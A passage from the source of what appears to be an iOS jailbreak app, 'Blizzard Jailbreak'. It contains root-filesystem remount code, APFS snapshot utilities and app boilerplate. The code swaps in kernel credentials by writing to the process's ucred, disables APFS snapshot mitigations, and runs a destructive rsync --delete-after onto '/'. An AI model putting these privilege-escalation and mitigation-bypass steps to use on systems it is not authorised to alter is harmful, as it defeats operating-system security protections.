        uint64_t creds = copyPIDCredentials(getpid(), 0);
        if (mountDevAtPathAsRW("/dev/disk0s1s1", "/var/rootfsmnt")) {
            printf("ROOT FS REMOUNT: Error mounting root at %s\n", "/var/rootfsmnt");
        }
        else {
            printf("ROOT FS REMOUNT: Disabling the APFS snapshot mitigations\n");
            char *snap = find_system_snapshot();
            // NOTE(review): the volume is unmounted only when the rename
            // succeeds; on failure /var/rootfsmnt stays mounted. `snap` is not
            // freed here; ownership is not visible from this function.
            if (snap && !renameAPFSSnapshot("/var/rootfsmnt", snap, "orig-fs")) {
                rv = 0;
                unmount("/var/rootfsmnt", 0);
                rmdir("/var/rootfsmnt");
            }
        }
        // The saved credentials are restored on every path through this branch
        // that reaches here, whether or not the mount and rename worked.
        printf("ROOT FS REMOUNT: Restoring our credentials\n");
        uint64_t proc_smp = proc_of_pid(getpid());
        wk64(proc_smp + off_p_ucred, creds);
        vnode_put(devVnode);
        if (rv) {
            printf("ROOT FS REMOUNT: Failed to disable the APFS snapshot mitigations\n");
        }
        else {
            printf("ROOT FS REMOUNT: Disabled the APFS snapshot mitigations\n");
            ret = 0;
        }
    }
    else {
        shouldReboot = 0;
        // NOTE(review): remount1126()'s BOOL result is ignored, so this branch
        // reports success even when the write test fails.
        ret = 0;
        remount1126();
    }
    return ret;
}
extern char* const* environ;
// Runs the executable at `launchPath` with `arguments` via posix_spawn and
// waits for it to finish. argv[0] is the last path component of launchPath.
//
// Returns posix_spawn's error number when the spawn itself fails; otherwise
// the raw wait status filled in by waitpid (not passed through WEXITSTATUS),
// which is 0 only for a normal exit with status 0.
// The arguments are passed as an argv array, so no shell interprets them.
int spawnBinaryWithArgs(NSURL *launchPath,NSArray *arguments) {
    NSMutableArray *argvObjects = [arguments mutableCopy];
    [argvObjects insertObject:[launchPath lastPathComponent] atIndex:0];

    // One slot more than the number of strings; calloc leaves it NULL, which
    // terminates argv.
    int slotCount = (int)argvObjects.count + 1;
    printf("Number of posix_spawn arguments: %d\n",slotCount);
    char **argv = (char**)calloc(slotCount,sizeof(char *));
    int slot = 0;
    for (id argument in argvObjects) {
        // The C strings are owned by the NSString objects in argvObjects.
        argv[slot++] = (char *)[argument UTF8String];
    }

    printf("File exists at launch path: %d\n",[[NSFileManager defaultManager]fileExistsAtPath:launchPath.path]);
    printf("Executing %s: %s\n",launchPath.path.UTF8String,arguments.description.UTF8String);

    posix_spawn_file_actions_t fileActions;
    posix_spawn_file_actions_init(&fileActions);
    pid_t child;
    int status = posix_spawn(&child, launchPath.path.UTF8String, &fileActions, NULL, argv, environ);
    if (status == 0) {
        (void)waitpid(child, &status, 0);
    }
    posix_spawn_file_actions_destroy(&fileActions);
    free(argv);
    return status;
}
/*
 * Polls for `filename` with access(F_OK): one immediate check, then up to
 * 100 further checks 100 ms apart (about 10 seconds in total).
 * Returns 0 as soon as the path exists, otherwise the last access() result.
 */
int checkifFileExistsAndWait(const char *filename) {
    int status = access(filename, F_OK);
    int attempts = 0;
    while (status != 0 && attempts < 100) {
        usleep(100000);
        status = access(filename, F_OK);
        attempts++;
    }
    return status;
}
// Builds the snapshot name APPLESNAP ("com.apple.os.update-") followed by
// `bootHash`. Returns NULL when bootHash is NULL.
//
// NOTE(review): the returned pointer is the UTF8String of a temporary
// NSString, so it is only valid while that string object is alive; callers
// should use it immediately or copy it. `bootHash` is not freed here, so a
// heap string passed in directly from copyBootHash() is never released.
const char *systemSnapshot(char *bootHash) {
    if (!bootHash) {
        return NULL;
    }
    return [[NSString stringWithFormat:@APPLESNAP @"%s", bootHash] UTF8String];
}
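// Renames the "orig-fs" snapshot on "/" back to the name derived from the
// boot manifest hash. On systems where kCFCoreFoundationVersionNumber is
// below 1452.23 it additionally mounts that snapshot at
// /var/MobileSoftwareUpdate/mnt1 and runs rsync with --delete-after from the
// mount onto "/", which removes files on "/" that the snapshot lacks.
//
// Returns -1 if the mount point cannot be created, 0 otherwise (unchanged).
// NOTE(review): 0 is also returned when the rename, mount or rsync fails;
// callers cannot tell those cases from success.
//
// Changes from the previous version:
//  - The credentials saved at the top are written back on every exit path.
//    Before, any path where the rename, the mount wait or rsync failed
//    returned with the temporary credentials still installed in the process.
//  - The descriptor opened on "/" for fs_snapshot_rename is closed.
int unjailbreakBlizzard(){
    int result = 0;
    printf("Blizzard Unjailbreak: Temporarily setting kernel credentials\n");
    uint64_t creds = copyPIDCredentials(getpid(), 0);
    int rootfd = open("/", O_RDONLY, 0);

    if (kCFCoreFoundationVersionNumber < 1452.23) {
        int retval = fs_snapshot_rename(rootfd, "orig-fs", systemSnapshot(copyBootHash()), 0);
        int mountpointReady = 1;
        if (access("/var/MobileSoftwareUpdate/mnt1", F_OK)) {
            if (mkdir("/var/MobileSoftwareUpdate/mnt1", 0755) != 0) {
                printf("Blizzard Unjailbreak: Failed to unjailbreak. Cannot access /var/MobileSoftwareUpdate/mnt1\n");
                mountpointReady = 0;
                result = -1;
            }
        }
        if (mountpointReady && retval == 0) {
            printf("Blizzard Unjailbreak: Successfully restored the default APFS Snapshot!\n");
            if (verifySnapshot("/", "orig-fs") == 1) {
                retval = spawnBinaryWithArgs([NSURL fileURLWithPath:@"/sbin/mount_apfs"], @[@"-s", @"orig-fs", @"/", @"/var/MobileSoftwareUpdate/mnt1"]);
            } else {
                retval = spawnBinaryWithArgs([NSURL fileURLWithPath:@"/sbin/mount_apfs"], @[@"-s", [NSString stringWithFormat:@"%s", systemSnapshot(copyBootHash())], @"/", @"/var/MobileSoftwareUpdate/mnt1"]);
            }
            // The mount is considered done once launchd is visible under the
            // mount point; the spawn result above is superseded by this check.
            retval = checkifFileExistsAndWait("/var/MobileSoftwareUpdate/mnt1/sbin/launchd");
            if (retval == 0) {
                retval = spawnBinaryWithArgs([NSURL fileURLWithPath:@"/usr/bin/rsync"], @[@"-vaxcH", @"--progress", @"--delete-after", @"/var/MobileSoftwareUpdate/mnt1/.", @"/"]);
            }
        }
    } else {
        (void)fs_snapshot_rename(rootfd, "orig-fs", systemSnapshot(copyBootHash()), 0);
    }

    if (rootfd >= 0) {
        close(rootfd);
    }
    // Always drop back to the credentials this process started with.
    printf("Blizzard Unjailbreak: Restoring our credentials\n");
    uint64_t proc_smp = proc_of_pid(getpid());
    wk64(proc_smp + off_p_ucred, creds);
    return result;
}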
================================================
FILE: APFS Utilities/snapshot_tools.c
================================================
#import <signal.h>
#import <stdlib.h>
#include <string.h>
#import <sys/attr.h>
#import <sys/snapshot.h>
#include <unistd.h>
#import "../Kernel Utilities/kernel_utils.h"
#import "../PatchFinder/patchfinder64.h"
#import "../Exploits/sock_port/offsetof.h"
#import "../Exploits/sock_port/offsets.h"
#include "../Exploits/sock_port/include/IOKit/IOKitLib.h"
#include "snapshot_tools.h"
#include "../Blizzard Jailbreak/BlizzardSpawnerTools.h"
#include "../Blizzard Jailbreak/blizzardJailbreak.h"
/*
 * Overlay for one record in the buffer filled by fs_snapshot_list() when
 * ATTR_BULK_REQUIRED is requested; verifySnapshot() casts the buffer to
 * this type.
 */
typedef struct val_attrs {
/* Used by verifySnapshot() as the stride to the next record. */
uint32_t length;
/* commonattr is tested for ATTR_CMN_NAME before the name is read. */
attribute_set_t returned;
/* attr_dataoffset is applied relative to the address of this field. */
attrreference_t name_info;
} val_attrs_t;
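/*
 * Print the name of each APFS snapshot returned for the volume at `vol`.
 *
 * fs_snapshot_list() is called once, so only the records that fit in the
 * 2048-byte buffer are printed.
 *
 * Returns 0 on success, -1 if the volume cannot be opened or the listing
 * call fails.
 */
int list_snapshots(const char *vol){
    int dirfd = open(vol, O_RDONLY, 0);
    if (dirfd < 0) {
        perror("get_dirfd");
        printf("List Snapshots: Failed to open file descriptor!\n");
        return -1;
    }

    struct attrlist alist = { 0 };
    char abuf[2048];
    alist.commonattr = ATTR_BULK_REQUIRED;

    int count = fs_snapshot_list(dirfd, &alist, &abuf[0], sizeof (abuf), 0);
    if (count < 0) {
        /* Report before close() so errno still belongs to the failed call. */
        perror("fs_snapshot_list");
        printf("List Snapshots: Failed to list Snapshots!\n");
        close(dirfd);
        return -1;
    }
    /* The descriptor is not needed once the records are in abuf. */
    close(dirfd);

    /* Every record starts with its length followed by the returned-attribute set. */
    const size_t header = sizeof (uint32_t) + sizeof (attribute_set_t);
    size_t pos = 0;

    for (int i = 0; i < count; i++) {
        size_t left = sizeof (abuf) - pos;
        if (left < header) {
            break;
        }

        /* abuf is a char array, so copy the fields out instead of casting. */
        uint32_t len;
        attribute_set_t attrs;
        memcpy(&len, abuf + pos, sizeof (len));
        memcpy(&attrs, abuf + pos + sizeof (len), sizeof (attrs));

        /* A length that is too small or overruns the buffer ends the walk. */
        if (len < header || len > left) {
            break;
        }

        if ((attrs.commonattr & ATTR_CMN_NAME) &&
            len - header >= sizeof (attrreference_t)) {
            attrreference_t ar;
            memcpy(&ar, abuf + pos + header, sizeof (ar));

            /* The name offset is relative to the attrreference_t itself. */
            if (ar.attr_dataoffset >= 0 &&
                (size_t)ar.attr_dataoffset < len - header) {
                size_t name_off = header + (size_t)ar.attr_dataoffset;
                /* Precision bounds the read to the end of this record. */
                (void) printf("\t ->> %.*s\n", (int)(len - name_off),
                              abuf + pos + name_off);
            }
        }
        pos += len;
    }
    return (0);
}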
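/*
 * Read the "boot-manifest-hash" property of IODeviceTree:/chosen and return
 * it as an upper-case hex string.
 *
 * Returns a heap-allocated, NUL-terminated string that the caller must
 * free(), or NULL if the registry entry or property cannot be read or the
 * allocation fails.
 */
char *copyBootHash() {
    io_registry_entry_t chosen = IORegistryEntryFromPath(kIOMasterPortDefault, "IODeviceTree:/chosen");
    unsigned char buf[1024];
    uint32_t size = sizeof (buf);

    if (!(chosen && chosen != -1)) {
        printf("List Snapshots: Unable to get IODeviceTree:/chosen port\n");
        return NULL;
    }

    kern_return_t ret = IORegistryEntryGetProperty(chosen, "boot-manifest-hash", (char*)buf, &size);
    IOObjectRelease(chosen);
    if (ret) {
        printf("List Snapshots: Unable to read boot-manifest-hash\n");
        return NULL;
    }

    /* Never format more bytes than buf holds, whatever size was reported back. */
    if (size > sizeof (buf)) {
        size = sizeof (buf);
    }

    /* Two hex digits per byte plus the terminator. */
    size_t hex_len = 2 * (size_t)size;
    char *result = calloc(hex_len + 1, 1);
    if (!result) {
        printf("List Snapshots: Out of memory while formatting boot-manifest-hash\n");
        return NULL;
    }

    for (uint32_t i = 0; i < size; i++) {
        snprintf(result + 2 * (size_t)i, 3, "%02X", buf[i]);
    }

    printf("List Snapshots: Hash: %s\n", result);
    /* Hand the buffer to the caller directly; duplicating it leaked the original. */
    return result;
}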
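/*
 * Build the system snapshot name "com.apple.os.update-<boot manifest hash>".
 *
 * Returns a heap-allocated string that the caller must free(), or NULL if
 * the boot hash cannot be obtained or the allocation fails.
 */
char *find_system_snapshot() {
    static const char prefix[] = "com.apple.os.update-";

    /* Check for NULL before taking the length: copyBootHash() can fail. */
    char *hash = copyBootHash();
    if (!hash) {
        return NULL;
    }

    /* sizeof (prefix) already counts the terminating NUL. */
    size_t cap = sizeof (prefix) + strlen(hash);
    char *str = malloc(cap);
    if (!str) {
        free(hash);
        return NULL;
    }

    snprintf(str, cap, "%s%s", prefix, hash);
    /* copyBootHash() returns heap memory owned by the caller. */
    free(hash);

    printf("List Snapshots: System snapshot: %s\n", str);
    return str;
}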
/*
 * Create an APFS snapshot called `snapshot` on the volume at `volume`.
 *
 * Returns 0 when fs_snapshot_create() succeeds, -1 when the volume cannot
 * be opened or the snapshot cannot be created.
 */
int createNewAPFSSnapshot(const char *volume, const char *snapshot) {
    printf("APFS Utilities: Preparing to create a new Snapshot...\n");

    int volume_fd = get_dirfd(volume);
    if (volume_fd < 0) {
        perror("open");
        printf("APFS Utilities: Failed to create a Snapshot! Error at get_dirfd.\n");
        return -1;
    }

    /* The descriptor is only needed for the duration of the call. */
    int status = fs_snapshot_create(volume_fd, snapshot, 0);
    close(volume_fd);

    if (status == 0) {
        return 0;
    }

    perror("fs_snapshot_create");
    printf("APFS Utilities: Failed to create a Snapshot! Error at fs_snapshot_create()\n");
    return -1;
}
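/*
 * Rename the APFS snapshot `snapshot` on the volume at `volume` to `nw`.
 *
 * Returns 0 on success, -1 if the volume cannot be opened or
 * fs_snapshot_rename() fails. The failure used to be reported as 0, so
 * callers could not tell that the snapshot had not been renamed.
 */
int renameAPFSSnapshot(const char *volume, const char *snapshot, const char *nw) {
    int fileDescriptor = open(volume, O_RDONLY);
    if (fileDescriptor < 0) {
        perror("open");
        printf("APFS Utilities: RENAME: Cannot open file descriptor.\n");
        return -1;
    }

    int retvalue = fs_snapshot_rename(fileDescriptor, snapshot, nw, 0);
    if (retvalue != 0) {
        /* Report before close() so errno still belongs to the failed call. */
        perror("fs_snapshot_rename");
        printf("APFS Utilities: RENAME: Failed to rename a Snapshot! Error at fs_snapshot_rename()\n");
    }
    close(fileDescriptor);

    return retvalue != 0 ? -1 : 0;
}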
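/*
 * Check whether the volume at `vol` has a snapshot whose name contains `name`.
 *
 * Every snapshot name seen is printed. Returns 1 when a match is found,
 * 0 when none is, and -1 if the volume cannot be opened, the buffer cannot
 * be allocated or the listing call fails.
 *
 * NOTE(review): the comparison is a substring match (strstr), so a snapshot
 * named e.g. "<name>-something" also counts as present. Callers that use the
 * result to decide which snapshot to mount may want an exact strcmp();
 * confirm against the callers before tightening.
 */
int verifySnapshot(const char *vol, const char *name){
    enum { LIST_BUF_SIZE = 2048 };
    /* Length field plus returned-attribute set precede the name reference. */
    const size_t header = sizeof (uint32_t) + sizeof (attribute_set_t);

    struct attrlist attr_list = { 0 };
    attr_list.commonattr = ATTR_BULK_REQUIRED;

    int fd = open(vol, O_RDONLY, 0);
    if (fd < 0) {
        perror("open");
        printf("List Snapshots: Failed to list snapshots!\n");
        return -1;
    }

    char *buf = calloc(LIST_BUF_SIZE, sizeof (char));
    if (!buf) {
        perror("calloc");
        close(fd);
        return -1;
    }

    int found = 0;
    int retcount;
    while (!found && (retcount = fs_snapshot_list(fd, &attr_list, buf, LIST_BUF_SIZE, 0)) > 0) {
        size_t pos = 0;
        for (int i = 0; i < retcount; i++) {
            size_t left = LIST_BUF_SIZE - pos;
            if (left < header) {
                break;
            }
            val_attrs_t *entry = (val_attrs_t *)(buf + pos);
            size_t reclen = entry->length;
            /* A length that is too small or overruns the buffer ends this batch. */
            if (reclen < header || reclen > left) {
                break;
            }

            if ((entry->returned.commonattr & ATTR_CMN_NAME) &&
                reclen >= sizeof (val_attrs_t) &&
                entry->name_info.attr_dataoffset >= 0) {
                size_t name_off = header + (size_t)entry->name_info.attr_dataoffset;
                /* Only treat the name as a C string if it terminates inside the record. */
                if (name_off < reclen &&
                    memchr(buf + pos + name_off, '\0', reclen - name_off)) {
                    const char *snap = buf + pos + name_off;
                    printf("%s\n", snap);
                    if (strstr(snap, name)) {
                        found = 1;
                        break;
                    }
                }
            }
            pos += reclen;
        }
    }

    int result = 0;
    if (found) {
        result = 1;
    } else if (retcount < 0) {
        /* Report before cleanup so errno still belongs to the failed call. */
        perror("fs_snapshot_list");
        printf("List Snapshots: Failed to list snapshots!\n");
        result = -1;
    }

    /* Single exit: the match path used to return without releasing these. */
    free(buf);
    close(fd);
    return result;
}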
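/*
 * Mount snapshot `name` of volume `vol` at `dir` by running
 * "/sbin/mount_apfs -s name vol dir" in a child process.
 *
 * The child is started through launchProcessFrozen(), given credentials via
 * copyPIDCredentials(pid, 0), and then resumed with SIGCONT.
 * NOTE(review): the meaning of the second argument (0) is defined by
 * copyPIDCredentials elsewhere in the project; confirm there.
 *
 * Returns the child's exit status, or -1 if the child could not be
 * launched, could not be waited for, or did not exit normally.
 */
int mountSnapshot(const char *vol, const char *name, const char *dir) {
    int proces_pid = launchProcessFrozen("/sbin/mount_apfs", "-s", (char *)name, (char *)vol, (char *)dir, NULL, NULL, NULL);

    /*
     * Stop here on a failed launch. kill() gives pid -1 and pid 0 a
     * broadcast / process-group meaning, so a failure value must never
     * reach the credential copy or the SIGCONT below.
     */
    if (proces_pid <= 0) {
        printf("APFS Utilities: MOUNT: Failed to launch /sbin/mount_apfs.\n");
        return -1;
    }

    copyPIDCredentials(proces_pid, 0);
    kill(proces_pid, SIGCONT);

    int status = 0;
    if (waitpid(proces_pid, &status, 0) < 0) {
        perror("waitpid");
        return -1;
    }

    /* WEXITSTATUS is only meaningful for a normal exit. */
    if (!WIFEXITED(status)) {
        return -1;
    }
    return WEXITSTATUS(status);
}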
================================================
FILE: APFS Utilities/snapshot_tools.h
================================================
#ifndef apfs_util_h
#define apfs_util_h
#define get_dirfd(vol) open(vol, O_RDONLY, 0)
char *find_snapshot_with_ref(const char *vol, const char *ref);
char *find_system_snapshot(void);
int createNewAPFSSnapshot(const char *volume, const char *snapshot);
int renameAPFSSnapshot(const char *volume, const char *snapshot, const char *nw);
int list_snapshots(const char *vol);
int check_snapshot(const char *vol, const char *snap);
char *copyBootHash(void);
int renameAPFSSnapshot(const char *vol, const char *snap, const char *nw);
int verifySnapshot(const char *vol, const char *name);
#endif
/* apfs_util_h */
================================================
FILE: Blizzard Jailbreak/AppDelegate.h
================================================
//
// AppDelegate.h
// sock_port
//
// Created by Jake James on 7/17/19.
// Copyright © 2019 Jake James. All rights reserved.
//
#import <UIKit/UIKit.h>
// Application delegate; exposes the single window property.
@interface AppDelegate : UIResponder <UIApplicationDelegate>
// The application's window, held strongly by the delegate.
@property (strong, nonatomic) UIWindow *window;
@end
================================================
FILE: Blizzard Jailbreak/AppDelegate.m
================================================
//
// AppDelegate.m
// sock_port
//
// Created by Jake James on 7/17/19.
// Copyright © 2019 Jake James. All rights reserved.
//
#import "AppDelegate.h"
@interface AppDelegate ()
@end
// Application delegate implementation. Every lifecycle callback below is
// empty apart from the launch callback, which only returns YES.
@implementation AppDelegate
// Launch callback: no setup is done here; returns YES unconditionally.
- (BOOL)application:(UIApplication *)application didFinishLaunchingWithOptions:(NSDictionary *)launchOptions {
return YES;
}
- (void)applicationWillResignActive:(UIApplication *)application {
// Sent when the application is about to move from active to inactive state. This can occur for certain types of temporary interruptions (such as an incoming phone call or SMS message) or when the user quits the application and it begins the transition to the background state.
// Use this method to pause ongoing tasks, disable timers, and invalidate graphics rendering callbacks. Games should use this method to pause the game.
}
- (void)applicationDidEnterBackground:(UIApplication *)application {
// Use this method to release shared resources, save user data, invalidate timers, and store enough application state information to restore your application to its current state in case it is terminated later.
// If your application supports background execution, this method is called instead of applicationWillTerminate: when the user quits.
}
- (void)applicationWillEnterForeground:(UIApplication *)application {
// Called as part of the transition from the background to the active state; here you can undo many of the changes made on entering the background.
}
- (void)applicationDidBecomeActive:(UIApplication *)application {
// Restart any tasks that were paused (or not yet started) while the application was inactive. If the application was previously in the background, optionally refresh the user interface.
}
- (void)applicationWillTerminate:(UIApplication *)application {
// Called when the application is about to terminate. Save data if appropriate. See also applicationDidEnterBackground:.
}
@end
================================================
FILE: Blizzard Jailbreak/Assets.xcassets/AppIcon.appiconset/Contents.json
================================================
{
"images" : [
{
"size" : "20x20",
"idiom" : "iphone",
"filename" : "notification-icon@2x.png",
"scale" : "2x"
},
{
"size" : "20x20",
"idiom" : "iphone",
"filename" : "notification-icon@3x.png",
"scale" : "3x"
},
{
"size" : "29x29",
"idiom" : "iphone",
"filename" : "icon-small.png",
"scale" : "1x"
},
{
"size" : "29x29",
"idiom" : "iphone",
"filename" : "icon-small@2x.png",
"scale" : "2x"
},
{
"size" : "29x29",
"idiom" : "iphone",
"filename" : "icon-small@3x.png",
"scale" : "3x"
},
{
"size" : "40x40",
"idiom" : "iphone",
"filename" : "icon-40@2x.png",
"scale" : "2x"
},
{
"size" : "40x40",
"idiom" : "iphone",
"filename" : "icon-40@3x.png",
"scale" : "3x"
},
{
"size" : "57x57",
"idiom" : "iphone",
"filename" : "icon.png",
"scale" : "1x"
},
{
"size" : "57x57",
"idiom" : "iphone",
"filename" : "icon@2x.png",
"scale" : "2x"
},
{
"size" : "60x60",
"idiom" : "iphone",
"filename" : "icon-60@2x.png",
"scale" : "2x"
},
{
"size" : "60x60",
"idiom" : "iphone",
"filename" : "icon-60@3x.png",
"scale" : "3x"
},
{
"size" : "20x20",
"idiom" : "ipad",
"filename" : "notification-icon~ipad.png",
"scale" : "1x"
},
{
"size" : "20x20",
"idiom" : "ipad",
"filename" : "notification-icon~ipad@2x.png",
"scale" : "2x"
},
{
"size" : "29x29",
"idiom" : "ipad",
"filename" : "icon-small.png",
"scale" : "1x"
},
{
"size" : "29x29",
"idiom" : "ipad",
"filename" : "icon-small@2x.png",
"scale" : "2x"
},
{
"size" : "40x40",
"idiom" : "ipad",
"filename" : "icon-40.png",
"scale" : "1x"
},
{
"size" : "40x40",
"idiom" : "ipad",
"filename" : "icon-40@2x.png",
"scale" : "2x"
},
{
"size" : "50x50",
"idiom" : "ipad",
"filename" : "icon-small-50.png",
"scale" : "1x"
},
{
"size" : "50x50",
"idiom" : "ipad",
"filename" : "icon-small-50@2x.png",
"scale" : "2x"
},
{
"size" : "72x72",
"idiom" : "ipad",
"filename" : "icon-72.png",
"scale" : "1x"
},
{
"size" : "72x72",
"idiom" : "ipad",
"filename" : "icon-72@2x.png",
"scale" : "2x"
},
{
"size" : "76x76",
"idiom" : "ipad",
"filename" : "icon-76.png",
"scale" : "1x"
},
{
"size" : "76x76",
"idiom" : "ipad",
"filename" : "icon-76@2x.png",
"scale" : "2x"
},
{
"size" : "83.5x83.5",
"idiom" : "ipad",
"filename" : "icon-83.5@2x.png",
"scale" : "2x"
},
{
"size" : "1024x1024",
"idiom" : "ios-marketing",
"filename" : "ios-marketing.png",
"scale" : "1x"
}
],
"info" : {
"version" : 1,
"author" : "xcode"
}
}
================================================
FILE: Blizzard Jailbreak/Assets.xcassets/Contents.json
================================================
{
"info" : {
"version" : 1,
"author" : "xcode"
}
}
================================================
FILE: Blizzard Jailbreak/Assets.xcassets/button_mask.imageset/Contents.json
================================================
{
"images" : [
{
"idiom" : "universal",
"filename" : "button_mask.png",
"scale" : "1x"
},
{
"idiom" : "universal",
"filename" : "button_mask-1.png",
"scale" : "2x"
},
{
"idiom" : "universal",
"filename" : "button_mask-2.png",
"scale" : "3x"
}
],
"info" : {
"version" : 1,
"author" : "xcode"
}
}
================================================
FILE: Blizzard Jailbreak/Assets.xcassets/jailbreak_wallpaper.imageset/Contents.json
================================================
{
"images" : [
{
"idiom" : "universal",
"filename" : "jailbreak_wallpaper.png",
"scale" : "1x"
},
{
"idiom" : "universal",
"filename" : "jailbreak_wallpaper-1.png",
"scale" : "2x"
},
{
"idiom" : "universal",
"filename" : "jailbreak_wallpaper-2.png",
"scale" : "3x"
}
],
"info" : {
"version" : 1,
"author" : "xcode"
}
}
================================================
FILE: Blizzard Jailbreak/Assets.xcassets/snow.imageset/Contents.json
================================================
{
"images" : [
{
"idiom" : "universal",
"filename" : "snow.png",
"scale" : "1x"
},
{
"idiom" : "universal",
"filename" : "snow-1.png",
"scale" : "2x"
},
{
"idiom" : "universal",
"filename" : "snow-2.png",
"scale" : "3x"
}
],
"info" : {
"version" : 1,
"author" : "xcode"
}
}
================================================
FILE: Blizzard Jailbreak/Assets.xcassets/winter.imageset/Contents.json
================================================
{
"images" : [
{
"idiom" : "universal",
"filename" : "winter.png",
"scale" : "1x"
},
{
"idiom" : "universal",
"filename" : "winter-1.png",
"scale" : "2x"
},
{
"idiom" : "universal",
"filename" : "winter-2.png",
"scale" : "3x"
}
],
"info" : {
"version" : 1,
"author" : "xcode"
}
}
================================================
FILE: Blizzard Jailbreak/Base.lproj/LaunchScreen.storyboard
================================================
<?xml version="1.0" encoding="UTF-8"?>
<document type="com.apple.InterfaceBuilder3.CocoaTouch.Storyboard.XIB" version="3.0" toolsVersion="14460.31" targetRuntime="iOS.CocoaTouch" propertyAccessControl="none" useAutolayout="YES" launchScreen="YES" useTraitCollections="YES" useSafeAreas="YES" colorMatched="YES" initialViewController="01J-lp-oVM">
<device id="retina4_0" orientation="portrait">
<adaptation id="fullscreen"/>
</device>
<dependencies>
<deployment identifier="iOS"/>
<plugIn identifier="com.apple.InterfaceBuilder.IBCocoaTouchPlugin" version="14460.20"/>
<capability name="Safe area layout guides" minToolsVersion="9.0"/>
<capability name="documents saved in the Xcode 8 format" minToolsVersion="8.0"/>
</dependencies>
<scenes>
<!--View Controller-->
<scene sceneID="EHf-IW-A2E">
<objects>
<viewController id="01J-lp-oVM" sceneMemberID="viewController">
<view key="view" contentMode="scaleToFill" id="Ze5-6b-2t3">
<rect key="frame" x="0.0" y="0.0" width="320" height="568"/>
<autoresizingMask key="autoresizingMask" widthSizable="YES" heightSizable="YES"/>
<subviews>
<imageView userInteractionEnabled="NO" contentMode="scaleToFill" horizontalHuggingPriority="251" verticalHuggingPriority="251" image="jailbreak_wallpaper" translatesAutoresizingMaskIntoConstraints="NO" id="7k9-n9-bzj">
<rect key="frame" x="0.0" y="0.0" width="320" height="568"/>
</imageView>
<imageView userInteractionEnabled="NO" contentMode="scaleAspectFit" horizontalHuggingPriority="251" verticalHuggingPriority="251" image="winter" translatesAutoresizingMaskIntoConstraints="NO" id="jb4-3I-IKu">
<rect key="frame" x="62" y="180" width="196" height="208"/>
<constraints>
<constraint firstAttribute="width" constant="196" id="lWd-Ki-AVK"/>
<constraint firstAttribute="height" constant="208" id="sRV-19-hKJ"/>
</constraints>
</imageView>
</subviews>
<color key="backgroundColor" red="1" green="1" blue="1" alpha="1" colorSpace="custom" customColorSpace="sRGB"/>
<constraints>
<constraint firstItem="7k9-n9-bzj" firstAttribute="leading" secondItem="6Tk-OE-BBY" secondAttribute="leading" id="9dU-lB-Nhq"/>
<constraint firstItem="6Tk-OE-BBY" firstAttribute="bottom" secondItem="jb4-3I-IKu" secondAttribute="bottom" constant="180" id="9rq-KG-m8u"/>
<constraint firstItem="7k9-n9-bzj" firstAttribute="trailing" secondItem="6Tk-OE-BBY" secondAttribute="trailing" id="Jed-NM-vvM"/>
<constraint firstItem="6Tk-OE-BBY" firstAttribute="trailing" secondItem="jb4-3I-IKu" secondAttribute="trailing" constant="62" id="Mx7-B6-Tcn"/>
<constraint firstAttribute="bottom" secondItem="7k9-n9-bzj" secondAttribute="bottom" id="b8b-ot-z8g"/>
<constraint firstItem="jb4-3I-IKu" firstAttribute="top" secondItem="6Tk-OE-BBY" secondAttribute="top" constant="160" id="bdZ-qC-bvW"/>
<constraint firstItem="7k9-n9-bzj" firstAttribute="top" secondItem="Ze5-6b-2t3" secondAttribute="top" id="d7b-ZU-nBc"/>
<constraint firstItem="jb4-3I-IKu" firstAttribute="leading" secondItem="6Tk-OE-BBY" secondAttribute="leading" constant="62" id="gBS-ew-kDl"/>
</constraints>
<viewLayoutGuide key="safeArea" id="6Tk-OE-BBY"/>
</view>
</viewController>
<placeholder placeholderIdentifier="IBFirstResponder" id="iYj-Kq-Ea1" userLabel="First Responder" sceneMemberID="firstResponder"/>
</objects>
<point key="canvasLocation" x="50.625" y="372.88732394366195"/>
</scene>
</scenes>
<resources>
<image name="jailbreak_wallpaper" width="834" height="1194"/>
<image name="winter" width="256" height="256"/>
</resources>
</document>
================================================
FILE: Blizzard Jailbreak/Base.lproj/Main.storyboard
================================================
<?xml version="1.0" encoding="UTF-8"?>
<document type="com.apple.InterfaceBuilder3.CocoaTouch.Storyboard.XIB" version="3.0" toolsVersion="14460.31" targetRuntime="iOS.CocoaTouch" propertyAccessControl="none" useAutolayout="YES" useTraitCollections="YES" useSafeAreas="YES" colorMatched="YES" initialViewController="BYZ-38-t0r">
<device id="retina4_0" orientation="portrait">
<adaptation id="fullscreen"/>
</device>
<dependencies>
<deployment identifier="iOS"/>
<plugIn identifier="com.apple.InterfaceBuilder.IBCocoaTouchPlugin" version="14460.20"/>
<capability name="Safe area layout guides" minToolsVersion="9.0"/>
<capability name="documents saved in the Xcode 8 format" minToolsVersion="8.0"/>
</dependencies>
<scenes>
<!--Blizzard View-->
<scene sceneID="tne-QT-ifu">
<objects>
<viewController id="BYZ-38-t0r" customClass="blizzardView" sceneMemberID="viewController">
<view key="view" contentMode="scaleToFill" id="8bC-Xf-vdC">
<rect key="frame" x="0.0" y="0.0" width="320" height="568"/>
<autoresizingMask key="autoresizingMask" widthSizable="YES" heightSizable="YES"/>
<subviews>
<imageView userInteractionEnabled="NO" contentMode="scaleToFill" horizontalHuggingPriority="251" verticalHuggingPriority="251" image="jailbreak_wallpaper" adjustsImageSizeForAccessibilityContentSizeCategory="YES" translatesAutoresizingMaskIntoConstraints="NO" id="IMk-rn-peb">
<rect key="frame" x="0.0" y="0.0" width="320" height="602"/>
</imageView>
<imageView userInteractionEnabled="NO" contentMode="scaleAspectFit" horizontalHuggingPriority="251" verticalHuggingPriority="251" image="winter" translatesAutoresizingMaskIntoConstraints="NO" id="Suw-j9-Sy3">
<rect key="frame" x="32" y="34" width="256" height="150"/>
<constraints>
<constraint firstAttribute="height" constant="150" id="4cz-MJ-nsh"/>
<constraint firstAttribute="height" constant="150" id="veZ-H9-MjK"/>
</constraints>
</imageView>
<label opaque="NO" userInteractionEnabled="NO" contentMode="left" horizontalHuggingPriority="251" verticalHuggingPriority="251" text="by GeoSn0w (@FCE365)" textAlignment="center" lineBreakMode="tailTruncation" baselineAdjustment="alignBaselines" adjustsFontForContentSizeCategory="YES" adjustsFontSizeToFit="NO" translatesAutoresizingMaskIntoConstraints="NO" id="2nt-NA-u5V">
<rect key="frame" x="30" y="527" width="260" height="21"/>
<constraints>
<constraint firstAttribute="height" constant="21" id="r0k-jY-g8T"/>
</constraints>
<fontDescription key="fontDescription" type="system" pointSize="17"/>
<color key="textColor" white="1" alpha="1" colorSpace="custom" customColorSpace="genericGamma22GrayColorSpace"/>
<nil key="highlightedColor"/>
</label>
